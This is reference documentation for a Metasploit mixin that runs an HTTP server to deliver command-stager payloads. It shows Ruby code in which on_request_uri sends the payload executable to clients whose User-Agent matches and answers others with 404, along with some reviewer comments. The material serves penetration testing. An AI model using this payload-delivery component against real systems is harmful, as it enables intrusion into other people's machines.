Module: Msf::Exploit::CmdStager::HTTP

Includes:
Remote::HttpServer
Included in:
Msf::Exploit::CmdStager
Defined in:
lib/msf/core/exploit/cmd_stager/http.rb

Instance Attribute Summary

Attributes included from Remote::SocketServer

#service

Instance Method Summary

Methods included from Remote::HttpServer

#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from Remote::TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version

Methods included from Remote::SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #via_string

Instance Method Details

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/exploit/cmd_stager/http.rb', line 8

# Sets up the mixin by handing the module info to the parent initializer,
# after passing it through update_info together with a 'Stance' entry of
# Msf::Exploit::Stance::Aggressive.
#
# @param info [Hash] module metadata supplied by the including module
def initialize(info = {})
  # NOTE(review): update_info is defined outside this listing; presumably it
  # merges the extra keys into info. Confirm against its definition.
  stance_info = update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive)
  super(stance_info)
end

#on_request_uri(cli, request) ⇒ Object



# File 'lib/msf/core/exploit/cmd_stager/http.rb', line 27

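# Handles one HTTP request to the stager's resource: logs who asked for what,
# answers 404 when the User-Agent does not match the pattern the stager
# expects, and otherwise responds with the payload.
#
# @param cli the client connection; only #peerhost is read here
# @param request the incoming request; #headers and #uri are read
# @return the result of send_not_found(cli) or send_response(cli, exe)
def on_request_uri(cli, request)
  user_agent = request.headers['User-Agent']

  # Build a new label rather than appending to the string returned by
  # cli.peerhost: `<<` would modify that object in place (and raise on a
  # frozen string), so the header text could end up stored on the connection.
  # NOTE(review): User-Agent is supplied by the remote peer and is written to
  # the console verbatim. Confirm print_status neutralises control characters.
  client = cli.peerhost.to_s
  client = "#{client} (#{user_agent})" if user_agent

  print_status("Client #{client} requested #{request.uri}")

  # NOTE: stager_instance is from Msf::Exploit::CmdStager
  agent_regex =
    if stager_instance.respond_to?(:user_agent)
      stager_instance.user_agent
    else
      /.*/
    end

  # A request without a User-Agent header leaves user_agent nil, and
  # `nil =~ regex` is nil, so such a request is answered with 404 even when
  # the catch-all pattern is in use.
  unless user_agent =~ agent_regex
    print_status("Sending 404 to #{client}")
    return send_not_found(cli)
  end

  print_status("Sending payload to #{client}")
  send_response(cli, exe) # NOTE: exe is from Msf::Exploit::CmdStager
end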

#start_service(opts = {}) ⇒ Object



# File 'lib/msf/core/exploit/cmd_stager/http.rb', line 14

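# Starts the HTTP service with datastore['SSL'] temporarily forced to the
# boolean value of opts[:ssl], and returns the URI reported by get_uri while
# that override is in effect.
#
# @param opts [Hash] options forwarded to the parent start_service; :ssl is
#   read here to decide the temporary SSL setting
# @return the value of get_uri
def start_service(opts = {})
  # XXX: This is a workaround until we can take SSL in opts
  datastore_ssl = datastore['SSL']
  datastore['SSL'] = !!opts[:ssl]

  begin
    super
    get_uri
  ensure
    # Restore the operator's SSL setting even when the parent start_service or
    # get_uri raises; otherwise the override would stay in the datastore and
    # later code would read the wrong transport setting.
    datastore['SSL'] = datastore_ssl
  end
end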